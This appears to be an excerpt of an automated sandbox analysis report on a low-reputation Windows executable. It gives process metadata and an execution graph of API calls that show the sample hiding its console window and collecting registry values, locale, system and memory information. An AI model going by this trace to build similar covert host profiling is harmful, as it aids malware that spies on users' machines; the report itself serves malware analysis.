            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:1
            Start time:05:46:17
            Start date:06/12/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6d64d0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Reset < >

              Execution Graph

              Execution Coverage:32.3%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:39.6%
              Total number of Nodes:652
              Total number of Limit Nodes:11
              execution_graph 3175 7ff7cea99bd0 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 3693 7ff7cea98750 3694 7ff7cea97c10 _Receive_impl 3 API calls 3693->3694 3696 7ff7cea98764 3694->3696 3695 7ff7cea98776 3696->3695 3697 7ff7cea9b500 _Receive_impl free 3696->3697 3697->3695 3698 7ff7cea9b950 3702 7ff7cea9c150 SetUnhandledExceptionFilter 3698->3702 3643 7ff7cea911d0 __std_exception_destroy 3644 7ff7cea91205 3643->3644 3645 7ff7cea911f8 3643->3645 3646 7ff7cea9b500 _Receive_impl free 3645->3646 3646->3644 3760 7ff7cea96cd0 3761 7ff7cea96ce9 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J 3760->3761 3762 7ff7cea96cf8 3760->3762 3761->3762 3763 7ff7cea96d79 3762->3763 3764 7ff7cea96d59 3762->3764 3765 7ff7cea96d2c memcpy 3762->3765 3764->3763 3766 7ff7cea96d65 fwrite 3764->3766 3765->3763 3765->3764 3766->3763 3767 7ff7cea968d0 3768 7ff7cea968e1 3767->3768 3772 7ff7cea9691e 3767->3772 3769 7ff7cea96916 3768->3769 3770 7ff7cea96931 _invalid_parameter_noinfo_noreturn 3768->3770 3771 7ff7cea9b500 _Receive_impl free 3769->3771 3777 7ff7cea99fb0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 3770->3777 3771->3772 3775 7ff7cea96965 3776 7ff7cea96978 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3778 7ff7cea9a012 3777->3778 3779 7ff7cea9a087 ??1_Lockit@std@@QEAA 3778->3779 3781 7ff7cea9a029 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 3778->3781 3782 7ff7cea9a035 3778->3782 3780 7ff7cea9b4e0 Concurrency::cancel_current_task 8 API calls 3779->3780 3783 7ff7cea96955 ?always_noconv@codecvt_base@std@ 3780->3783 3781->3782 3782->3779 3784 7ff7cea9a04c ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 3782->3784 3783->3775 3783->3776 3785 7ff7cea9a060 3784->3785 3786 7ff7cea9a0b7 3784->3786 3791 7ff7cea9b448 3785->3791 3794 7ff7cea91470 3786->3794 3790 7ff7cea9a0bc 3792 7ff7cea9b508 std::_Facet_Register 3 API calls 3791->3792 3793 7ff7cea9a072 3792->3793 3793->3779 3797 7ff7cea91440 3794->3797 3796 7ff7cea9147e _CxxThrowException __std_exception_copy 3796->3790 3797->3796 3177 7ff7cea96bc0 3178 7ff7cea96bf3 3177->3178 3185 7ff7cea96c51 3178->3185 3186 7ff7cea988f0 3178->3186 3180 7ff7cea96c16 3183 7ff7cea96c24 _fseeki64 3180->3183 3184 7ff7cea96c3b fgetpos 3180->3184 3180->3185 3183->3184 3183->3185 3184->3185 3198 7ff7cea9b4e0 3185->3198 3187 7ff7cea989c3 3186->3187 3188 7ff7cea98913 3186->3188 3189 7ff7cea9b4e0 Concurrency::cancel_current_task 8 API calls 3187->3189 3188->3187 3190 7ff7cea9891d 3188->3190 3191 7ff7cea989d2 3189->3191 3192 7ff7cea98961 3190->3192 3193 7ff7cea98936 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD 3190->3193 3191->3180 3195 7ff7cea9b4e0 Concurrency::cancel_current_task 8 API calls 3192->3195 3194 7ff7cea9895c 3193->3194 3194->3192 3196 7ff7cea98997 fwrite 3194->3196 3197 7ff7cea9897e 3195->3197 3196->3192 3197->3180 3199 7ff7cea9b4e9 3198->3199 3200 7ff7cea96cbb 3199->3200 3201 7ff7cea9bb34 IsProcessorFeaturePresent 3199->3201 3202 7ff7cea9bb4c 3201->3202 3207 7ff7cea9bc08 RtlCaptureContext 3202->3207 3208 7ff7cea9bc22 RtlLookupFunctionEntry 3207->3208 3209 7ff7cea9bb5f 3208->3209 3210 7ff7cea9bc38 RtlVirtualUnwind 3208->3210 3211 7ff7cea9bb00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3209->3211 3210->3208 3210->3209 3647 7ff7cea917c0 3648 7ff7cea97c10 _Receive_impl 3 API calls 3647->3648 3649 7ff7cea91802 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3648->3649 3892 7ff7cea97240 3893 7ff7cea9725b 3892->3893 3894 7ff7cea97271 3893->3894 3895 7ff7cea972ab ungetc 3893->3895 3895->3894 3650 7ff7cea9c9bc 3651 7ff7cea9c9cf 3650->3651 3652 7ff7cea9c9dc 3650->3652 3654 7ff7cea98450 3651->3654 3655 7ff7cea9848f 3654->3655 3656 7ff7cea98463 3654->3656 3655->3652 3657 7ff7cea98487 3656->3657 3658 7ff7cea984a8 _invalid_parameter_noinfo_noreturn 3656->3658 3659 7ff7cea9b500 _Receive_impl free 3657->3659 3659->3655 3707 7ff7cea9cf30 ??1_Lockit@std@@QEAA 3807 7ff7cea986b0 3813 7ff7cea97530 3807->3813 3814 7ff7cea9754d 3813->3814 3815 7ff7cea975f5 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 3814->3815 3816 7ff7cea975cc ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3814->3816 3817 7ff7cea988f0 10 API calls 3814->3817 3816->3815 3818 7ff7cea975bf fclose 3817->3818 3818->3816 3819 7ff7cea988b0 ?uncaught_exception@std@ 3820 7ff7cea988c3 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3819->3820 3821 7ff7cea988cd 3819->3821 3820->3821 3897 7ff7cea98830 ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA 3898 7ff7cea98861 3897->3898 3899 7ff7cea98854 3897->3899 3900 7ff7cea9b500 _Receive_impl free 3899->3900 3900->3898 3901 7ff7cea9c630 3902 7ff7cea9c643 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3901->3902 3903 7ff7cea9c658 3901->3903 3902->3903 3708 7ff7cea97330 3710 7ff7cea97356 3708->3710 3712 7ff7cea9735d 3708->3712 3709 7ff7cea9b4e0 Concurrency::cancel_current_task 8 API calls 3711 7ff7cea974d6 3709->3711 3710->3709 3712->3710 3713 7ff7cea973e3 fputc 3712->3713 3714 7ff7cea97405 ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 3712->3714 3713->3710 3715 7ff7cea97474 3714->3715 3716 7ff7cea9744a 3714->3716 3715->3710 3717 7ff7cea97483 fwrite 3715->3717 3716->3715 3718 7ff7cea9744f 3716->3718 3717->3710 3718->3710 3719 7ff7cea97454 fputc 3718->3719 3719->3710 3660 7ff7cea9cdae ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA 3212 7ff7cea96da0 3213 7ff7cea96dc2 3212->3213 3214 7ff7cea96db7 3212->3214 3215 7ff7cea96dc9 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J 3213->3215 3216 7ff7cea96dd8 3213->3216 3215->3216 3217 7ff7cea96dfd memcpy 3216->3217 3219 7ff7cea96e32 3216->3219 3217->3219 3218 7ff7cea96ece 3219->3218 3220 7ff7cea96eae 3219->3220 3221 7ff7cea96e80 fread 3219->3221 3220->3218 3222 7ff7cea96eb3 fread 3220->3222 3221->3218 3221->3219 3222->3218 3724 7ff7cea93720 3725 7ff7cea97c10 _Receive_impl 3 API calls 3724->3725 3726 7ff7cea93762 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3725->3726 3908 7ff7cea91220 __std_exception_destroy 3822 7ff7cea9ba9a 3823 7ff7cea9c0fc GetModuleHandleW 3822->3823 3824 7ff7cea9baa1 3823->3824 3825 7ff7cea9bae0 _exit 3824->3825 3826 7ff7cea9baa5 3824->3826 3909 7ff7cea9d01c 3911 7ff7cea9d024 3909->3911 3910 7ff7cea9d071 3911->3910 3912 7ff7cea9b500 _Receive_impl free 3911->3912 3912->3911 3665 7ff7cea9c610 3666 7ff7cea9b500 _Receive_impl free 3665->3666 3667 7ff7cea9c627 3666->3667 3727 7ff7cea98790 3728 7ff7cea97c10 _Receive_impl 3 API calls 3727->3728 3729 7ff7cea987e1 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3728->3729 3730 7ff7cea987fa 3729->3730 3731 7ff7cea9880b 3729->3731 3732 7ff7cea9b500 _Receive_impl free 3730->3732 3732->3731 3223 7ff7cea97a10 3224 7ff7cea97a3d 3223->3224 3226 7ff7cea97a38 3223->3226 3225 7ff7cea97af7 3227 7ff7cea9b508 std::_Facet_Register 3 API calls 3225->3227 3226->3224 3226->3225 3229 7ff7cea97ab9 3226->3229 3231 7ff7cea97ac6 3226->3231 3234 7ff7cea97aab 3226->3234 3227->3234 3228 7ff7cea97b10 memcpy 3238 7ff7cea97b4b 3228->3238 3230 7ff7cea97c03 3229->3230 3229->3231 3252 7ff7cea91270 3230->3252 3231->3224 3240 7ff7cea9b508 3231->3240 3234->3228 3235 7ff7cea97bde _invalid_parameter_noinfo_noreturn 3234->3235 3235->3224 3236 7ff7cea97c08 3237 7ff7cea97bb0 3249 7ff7cea9b500 3237->3249 3238->3224 3238->3235 3238->3237 3241 7ff7cea9b522 malloc 3240->3241 3242 7ff7cea9b513 3241->3242 3243 7ff7cea9b52c 3241->3243 3242->3241 3244 7ff7cea9b532 3242->3244 3243->3234 3245 7ff7cea9b53d 3244->3245 3255 7ff7cea9bca4 3244->3255 3247 7ff7cea91270 Concurrency::cancel_current_task __std_exception_copy 3245->3247 3248 7ff7cea9b543 3247->3248 3250 7ff7cea9bc7c free 3249->3250 3253 7ff7cea9127e Concurrency::cancel_current_task 3252->3253 3254 7ff7cea9128f __std_exception_copy 3253->3254 3254->3236 3258 7ff7cea9bc84 3255->3258 3257 7ff7cea9bcb2 _CxxThrowException 3258->3257 3668 7ff7cea97610 3669 7ff7cea97621 3668->3669 3670 7ff7cea9764e 3668->3670 3671 7ff7cea97646 3669->3671 3673 7ff7cea97661 _invalid_parameter_noinfo_noreturn 3669->3673 3672 7ff7cea9b500 _Receive_impl free 3671->3672 3672->3670 3674 7ff7cea9767e 3673->3674 3733 7ff7cea96990 3734 7ff7cea969d0 3733->3734 3735 7ff7cea969a3 3733->3735 3735->3734 3736 7ff7cea969b3 fflush 3735->3736 3827 7ff7cea97510 3828 7ff7cea97523 3827->3828 3829 7ff7cea9751c _lock_file 3827->3829 3829->3828 3913 7ff7cea9c494 3914 7ff7cea9c4cc __GSHandlerCheckCommon 3913->3914 3915 7ff7cea9c4f8 3914->3915 3916 7ff7cea9c4e7 __CxxFrameHandler4 3914->3916 3916->3915 3917 7ff7cea9b888 3918 7ff7cea9b898 3917->3918 3930 7ff7cea9b68c 3918->3930 3920 7ff7cea9bfac 9 API calls 3921 7ff7cea9b93d 3920->3921 3922 7ff7cea9b8bc _RTC_Initialize 3927 7ff7cea9b91f 3922->3927 3938 7ff7cea9c270 InitializeSListHead 3922->3938 3927->3920 3929 7ff7cea9b92d 3927->3929 3931 7ff7cea9b69d 3930->3931 3935 7ff7cea9b6cf 3930->3935 3932 7ff7cea9b70c 3931->3932 3936 7ff7cea9b6a2 __scrt_release_startup_lock 3931->3936 3933 7ff7cea9bfac 9 API calls 3932->3933 3934 7ff7cea9b716 3933->3934 3935->3922 3936->3935 3937 7ff7cea9b6bf _initialize_onexit_table 3936->3937 3937->3935 3939 7ff7cea9ce88 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N 3259 7ff7cea91000 ?_Init@locale@std@@CAPEAV_Locimp@12@_N 3260 7ff7cea9b508 std::_Facet_Register 3 API calls 3259->3260 3261 7ff7cea9107b ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@ ??Bid@locale@std@ ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD 3260->3261 3262 7ff7cea910f2 3261->3262 3834 7ff7cea97d00 3837 7ff7cea97d3b 3834->3837 3835 7ff7cea9b4e0 Concurrency::cancel_current_task 8 API calls 3836 7ff7cea97e5a 3835->3836 3837->3835 3952 7ff7cea9c67c 3953 7ff7cea9c68f 3952->3953 3954 7ff7cea9c69c 3952->3954 3955 7ff7cea98450 2 API calls 3953->3955 3955->3954 3679 7ff7cea9cdfe ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA 3176 7ff7cea99df0 ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 3956 7ff7cea98670 3957 7ff7cea97530 13 API calls 3956->3957 3958 7ff7cea98684 3957->3958 3959 7ff7cea98696 3958->3959 3960 7ff7cea9b500 _Receive_impl free 3958->3960 3960->3959 3961 7ff7cea98870 3966 7ff7cea98120 3961->3966 3963 7ff7cea98884 3964 7ff7cea98896 3963->3964 3965 7ff7cea9b500 _Receive_impl free 3963->3965 3965->3964 3967 7ff7cea98141 3966->3967 3968 7ff7cea98177 3966->3968 3969 7ff7cea981fd _invalid_parameter_noinfo_noreturn 3967->3969 3970 7ff7cea9b500 _Receive_impl free 3967->3970 3968->3969 3971 7ff7cea981b8 3968->3971 3976 7ff7cea981c0 3968->3976 3972 7ff7cea98254 3969->3972 3975 7ff7cea98223 3969->3975 3970->3968 3973 7ff7cea9b500 _Receive_impl free 3971->3973 3972->3963 3973->3976 3974 7ff7cea9824c 3978 7ff7cea9b500 _Receive_impl free 3974->3978 3975->3974 3977 7ff7cea9826b _invalid_parameter_noinfo_noreturn 3975->3977 3976->3963 3978->3972 3748 7ff7cea91170 __std_exception_copy 3838 7ff7cea96ef0 3839 7ff7cea96f27 3838->3839 3840 7ff7cea96fa2 fgetc 3839->3840 3841 7ff7cea96fbe fgetc 3839->3841 3844 7ff7cea96f37 3839->3844 3840->3844 3850 7ff7cea96feb 3841->3850 3852 7ff7cea970f0 3841->3852 3842 7ff7cea9b4e0 Concurrency::cancel_current_task 8 API calls 3843 7ff7cea971ab 3842->3843 3844->3842 3845 7ff7cea97198 3849 7ff7cea9b500 _Receive_impl free 3845->3849 3846 7ff7cea9702a ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 3846->3850 3848 7ff7cea9712f _invalid_parameter_noinfo_noreturn 3848->3852 3849->3844 3850->3846 3851 7ff7cea9709d memcpy fgetc 3850->3851 3850->3852 3854 7ff7cea9714e 3850->3854 3855 7ff7cea9a570 3850->3855 3851->3850 3851->3852 3852->3844 3852->3845 3852->3848 3853 7ff7cea97170 ungetc 3853->3852 3853->3854 3854->3852 3854->3853 3856 7ff7cea9a6c5 3855->3856 3873 7ff7cea91310 ?_Xlength_error@std@@YAXPEBD 3856->3873 3874 7ff7cea974f0 3875 7ff7cea97503 3874->3875 3876 7ff7cea974fc _unlock_file 3874->3876 3876->3875 3749 7ff7cea99974 3750 7ff7cea99982 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3749->3750 3751 7ff7cea999b2 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3750->3751 3752 7ff7cea999bc 3750->3752 3751->3752 3753 7ff7cea9cf76 3754 7ff7cea9cf9f 3753->3754 3755 7ff7cea9cfab __current_exception __current_exception_context terminate 3753->3755 3755->3754 3877 7ff7cea9bae8 3880 7ff7cea9c1bc 3877->3880 3881 7ff7cea9c1df GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 3880->3881 3882 7ff7cea9baf1 3880->3882 3881->3882 3263 7ff7cea9b96c 3264 7ff7cea9b985 3263->3264 3265 7ff7cea9bac3 3264->3265 3266 7ff7cea9b98d __scrt_acquire_startup_lock 3264->3266 3451 7ff7cea9bfac IsProcessorFeaturePresent 3265->3451 3268 7ff7cea9bacd 3266->3268 3273 7ff7cea9b9ab __scrt_release_startup_lock 3266->3273 3269 7ff7cea9bfac 9 API calls 3268->3269 3270 7ff7cea9bad8 3269->3270 3272 7ff7cea9bae0 _exit 3270->3272 3271 7ff7cea9b9d0 3273->3271 3274 7ff7cea9ba56 _get_initial_narrow_environment __p___argv __p___argc 3273->3274 3277 7ff7cea9ba4e _register_thread_local_exe_atexit_callback 3273->3277 3283 7ff7cea95d80 GetConsoleWindow ShowWindow 3274->3283 3277->3274 3280 7ff7cea9ba83 3281 7ff7cea9ba88 _cexit 3280->3281 3282 7ff7cea9ba8d 3280->3282 3281->3282 3282->3271 3457 7ff7cea99610 3283->3457 3285 7ff7cea95e03 3461 7ff7cea94a40 3285->3461 3289 7ff7cea95e1a 3290 7ff7cea95e5b 3289->3290 3292 7ff7cea95e56 3289->3292 3295 7ff7cea95e4f _invalid_parameter_noinfo_noreturn 3289->3295 3291 7ff7cea99610 memcpy 3290->3291 3294 7ff7cea95e71 3291->3294 3293 7ff7cea9b500 _Receive_impl free 3292->3293 3293->3290 3510 7ff7cea94640 GetLocaleInfoA 3294->3510 3295->3292 3298 7ff7cea983c0 memcpy 3299 7ff7cea95e88 3298->3299 3300 7ff7cea95ec9 3299->3300 3301 7ff7cea95ec4 3299->3301 3303 7ff7cea95ebd _invalid_parameter_noinfo_noreturn 3299->3303 3302 7ff7cea99610 memcpy 3300->3302 3304 7ff7cea9b500 _Receive_impl free 3301->3304 3305 7ff7cea95edf 3302->3305 3303->3301 3304->3300 3546 7ff7cea93560 GetSystemInfo memset 3305->3546 3308 7ff7cea983c0 memcpy 3309 7ff7cea95ef6 3308->3309 3310 7ff7cea95f37 3309->3310 3311 7ff7cea95f32 3309->3311 3313 7ff7cea95f2b _invalid_parameter_noinfo_noreturn 3309->3313 3312 7ff7cea99610 memcpy 3310->3312 3314 7ff7cea9b500 _Receive_impl free 3311->3314 3315 7ff7cea95f4d GlobalMemoryStatusEx memset 3312->3315 3313->3311 3314->3310 3563 7ff7cea96810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3315->3563 3317 7ff7cea95f7a 3564 7ff7cea999f0 3317->3564 3320 7ff7cea999f0 9 API calls 3321 7ff7cea95faf 3320->3321 3322 7ff7cea96048 3321->3322 3583 7ff7cea996c0 3321->3583 3578 7ff7cea97c10 3322->3578 3325 7ff7cea96078 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3326 7ff7cea983c0 memcpy 3325->3326 3327 7ff7cea9609e 3326->3327 3328 7ff7cea960dc 3327->3328 3330 7ff7cea9676e _invalid_parameter_noinfo_noreturn 3327->3330 3331 7ff7cea9b500 _Receive_impl free 3327->3331 3329 7ff7cea99610 memcpy 3328->3329 3332 7ff7cea960f2 3329->3332 3334 7ff7cea96775 3330->3334 3331->3328 3333 7ff7cea93780 48 API calls 3332->3333 3335 7ff7cea960fc 3333->3335 3336 7ff7cea9b500 _Receive_impl free 3334->3336 3337 7ff7cea983c0 memcpy 3335->3337 3338 7ff7cea9677a 3336->3338 3339 7ff7cea96109 3337->3339 3340 7ff7cea967cc 3338->3340 3341 7ff7cea967c7 3338->3341 3344 7ff7cea967c0 _invalid_parameter_noinfo_noreturn 3338->3344 3343 7ff7cea9614a 3339->3343 3348 7ff7cea96145 3339->3348 3351 7ff7cea9613e _invalid_parameter_noinfo_noreturn 3339->3351 3342 7ff7cea9b4e0 Concurrency::cancel_current_task 8 API calls 3340->3342 3346 7ff7cea9b500 _Receive_impl free 3341->3346 3347 7ff7cea967dd 3342->3347 3345 7ff7cea99610 memcpy 3343->3345 3344->3341 3350 7ff7cea96160 3345->3350 3346->3340 3449 7ff7cea9c0fc GetModuleHandleW 3347->3449 3349 7ff7cea9b500 _Receive_impl free 3348->3349 3349->3343 3352 7ff7cea93aa0 38 API calls 3350->3352 3351->3348 3353 7ff7cea9616a 3352->3353 3354 7ff7cea983c0 memcpy 3353->3354 3355 7ff7cea96177 3354->3355 3356 7ff7cea961b8 3355->3356 3357 7ff7cea961b3 3355->3357 3359 7ff7cea961ac _invalid_parameter_noinfo_noreturn 3355->3359 3358 7ff7cea94e50 28 API calls 3356->3358 3360 7ff7cea9b500 _Receive_impl free 3357->3360 3361 7ff7cea961c1 3358->3361 3359->3357 3360->3356 3362 7ff7cea967fe 3361->3362 3369 7ff7cea961e0 3361->3369 3364 7ff7cea91310 ?_Xlength_error@std@@YAXPEBD 3362->3364 3363 7ff7cea96288 memcpy 3365 7ff7cea99610 memcpy 3363->3365 3367 7ff7cea96803 3364->3367 3368 7ff7cea962d9 3365->3368 3366 7ff7cea9621b 3371 7ff7cea9b508 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 3366->3371 3374 7ff7cea91270 Concurrency::cancel_current_task __std_exception_copy 3367->3374 3370 7ff7cea983c0 memcpy 3368->3370 3369->3363 3369->3366 3372 7ff7cea9627c 3369->3372 3373 7ff7cea9626d 3369->3373 3376 7ff7cea96234 3369->3376 3375 7ff7cea9630b 3370->3375 3371->3376 3378 7ff7cea9b508 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 3372->3378 3373->3366 3373->3367 3377 7ff7cea96809 3374->3377 3380 7ff7cea96347 3375->3380 3385 7ff7cea96340 _invalid_parameter_noinfo_noreturn 3375->3385 3388 7ff7cea9634c 3375->3388 3376->3363 3379 7ff7cea9637f _invalid_parameter_noinfo_noreturn 3376->3379 3378->3376 3382 7ff7cea96386 3379->3382 3386 7ff7cea9b500 _Receive_impl free 3380->3386 3381 7ff7cea9638b 3384 7ff7cea99610 memcpy 3381->3384 3383 7ff7cea9b500 _Receive_impl free 3382->3383 3383->3381 3387 7ff7cea963a1 3384->3387 3385->3380 3386->3388 3389 7ff7cea93cd0 59 API calls 3387->3389 3388->3379 3388->3381 3388->3382 3390 7ff7cea963ab 3389->3390 3391 7ff7cea983c0 memcpy 3390->3391 3392 7ff7cea963b8 3391->3392 3393 7ff7cea963f9 3392->3393 3394 7ff7cea963f4 3392->3394 3396 7ff7cea963ed _invalid_parameter_noinfo_noreturn 3392->3396 3395 7ff7cea99610 memcpy 3393->3395 3397 7ff7cea9b500 _Receive_impl free 3394->3397 3398 7ff7cea9640f 3395->3398 3396->3394 3397->3393 3399 7ff7cea93f60 58 API calls 3398->3399 3400 7ff7cea96419 3399->3400 3401 7ff7cea983c0 memcpy 3400->3401 3402 7ff7cea96426 3401->3402 3403 7ff7cea96467 3402->3403 3404 7ff7cea96462 3402->3404 3406 7ff7cea9645b _invalid_parameter_noinfo_noreturn 3402->3406 3405 7ff7cea94180 58 API calls 3403->3405 3407 7ff7cea9b500 _Receive_impl free 3404->3407 3408 7ff7cea96471 3405->3408 3406->3404 3407->3403 3409 7ff7cea983c0 memcpy 3408->3409 3410 7ff7cea9647e 3409->3410 3411 7ff7cea964bf memset 3410->3411 3413 7ff7cea964ba 3410->3413 3414 7ff7cea964b3 _invalid_parameter_noinfo_noreturn 3410->3414 3412 7ff7cea96810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3411->3412 3416 7ff7cea964d9 GetModuleFileNameA 3412->3416 3415 7ff7cea9b500 _Receive_impl free 3413->3415 3414->3413 3415->3411 3417 7ff7cea999f0 9 API calls 3416->3417 3418 7ff7cea964ff 3417->3418 3419 7ff7cea999f0 9 API calls 3418->3419 3420 7ff7cea9650e 3419->3420 3421 7ff7cea999f0 9 API calls 3420->3421 3422 7ff7cea9651d 3421->3422 3423 7ff7cea965b6 3422->3423 3424 7ff7cea996c0 8 API calls 3422->3424 3425 7ff7cea97c10 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3423->3425 3424->3423 3426 7ff7cea965df ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3425->3426 3427 7ff7cea983c0 memcpy 3426->3427 3428 7ff7cea96605 3427->3428 3429 7ff7cea96643 3428->3429 3432 7ff7cea9672c _invalid_parameter_noinfo_noreturn 3428->3432 3433 7ff7cea9b500 _Receive_impl free 3428->3433 3430 7ff7cea99610 memcpy 3429->3430 3431 7ff7cea96659 3430->3431 3434 7ff7cea94390 42 API calls 3431->3434 3435 7ff7cea96733 3432->3435 3433->3429 3436 7ff7cea96663 3434->3436 3437 7ff7cea9b500 _Receive_impl free 3435->3437 3438 7ff7cea983c0 memcpy 3436->3438 3442 7ff7cea9673b 3437->3442 3439 7ff7cea96670 3438->3439 3440 7ff7cea966b1 3439->3440 3441 7ff7cea966ac 3439->3441 3444 7ff7cea966a5 _invalid_parameter_noinfo_noreturn 3439->3444 3443 7ff7cea95510 51 API calls 3440->3443 3445 7ff7cea9b500 _Receive_impl free 3441->3445 3442->3330 3442->3334 3442->3338 3446 7ff7cea966c7 3443->3446 3444->3441 3445->3440 3447 7ff7cea91b50 175 API calls 3446->3447 3448 7ff7cea966ea 3447->3448 3448->3432 3448->3435 3448->3442 3450 7ff7cea9ba7f 3449->3450 3450->3270 3450->3280 3452 7ff7cea9bfd2 3451->3452 3453 7ff7cea9bfe0 memset RtlCaptureContext RtlLookupFunctionEntry 3452->3453 3454 7ff7cea9c056 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3453->3454 3455 7ff7cea9c01a RtlVirtualUnwind 3453->3455 3456 7ff7cea9c0d6 3454->3456 3455->3454 3456->3268 3458 7ff7cea99633 memcpy 3457->3458 3460 7ff7cea99672 3457->3460 3458->3285 3460->3285 3603 7ff7cea9c530 3461->3603 3465 7ff7cea94af1 RegOpenKeyExA 3466 7ff7cea94b97 RegOpenKeyExA 3465->3466 3467 7ff7cea94b1d RegGetValueA 3465->3467 3468 7ff7cea94bc2 RegGetValueA 3466->3468 3469 7ff7cea94c3c RegOpenKeyExA 3466->3469 3470 7ff7cea94b84 RegCloseKey 3467->3470 3471 7ff7cea94b56 3467->3471 3472 7ff7cea94c29 RegCloseKey 3468->3472 3473 7ff7cea94bfb 3468->3473 3474 7ff7cea94c6b RegGetValueA 3469->3474 3485 7ff7cea94d4c 3469->3485 3470->3466 3475 7ff7cea999f0 9 API calls 3471->3475 3472->3469 3476 7ff7cea999f0 9 API calls 3473->3476 3477 7ff7cea94cd2 RegGetValueA 3474->3477 3478 7ff7cea94ca4 3474->3478 3479 7ff7cea94b66 3475->3479 3482 7ff7cea94c0b 3476->3482 3480 7ff7cea94d39 RegCloseKey 3477->3480 3481 7ff7cea94d0b 3477->3481 3483 7ff7cea999f0 9 API calls 3478->3483 3484 7ff7cea999f0 9 API calls 3479->3484 3480->3485 3486 7ff7cea999f0 9 API calls 3481->3486 3487 7ff7cea999f0 9 API calls 3482->3487 3488 7ff7cea94cb4 3483->3488 3489 7ff7cea94b75 3484->3489 3490 7ff7cea94dd9 3485->3490 3495 7ff7cea996c0 8 API calls 3485->3495 3491 7ff7cea94d1b 3486->3491 3492 7ff7cea94c1a 3487->3492 3493 7ff7cea999f0 9 API calls 3488->3493 3494 7ff7cea999f0 9 API calls 3489->3494 3496 7ff7cea97c10 _Receive_impl 3 API calls 3490->3496 3497 7ff7cea999f0 9 API calls 3491->3497 3498 7ff7cea999f0 9 API calls 3492->3498 3499 7ff7cea94cc3 3493->3499 3494->3470 3495->3490 3500 7ff7cea94e0b ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3496->3500 3501 7ff7cea94d2a 3497->3501 3498->3472 3502 7ff7cea999f0 9 API calls 3499->3502 3503 7ff7cea9b4e0 Concurrency::cancel_current_task 8 API calls 3500->3503 3504 7ff7cea999f0 9 API calls 3501->3504 3502->3477 3505 7ff7cea94e31 3503->3505 3504->3480 3506 7ff7cea983c0 3505->3506 3507 7ff7cea983d7 3506->3507 3508 7ff7cea98433 3507->3508 3509 7ff7cea9840a 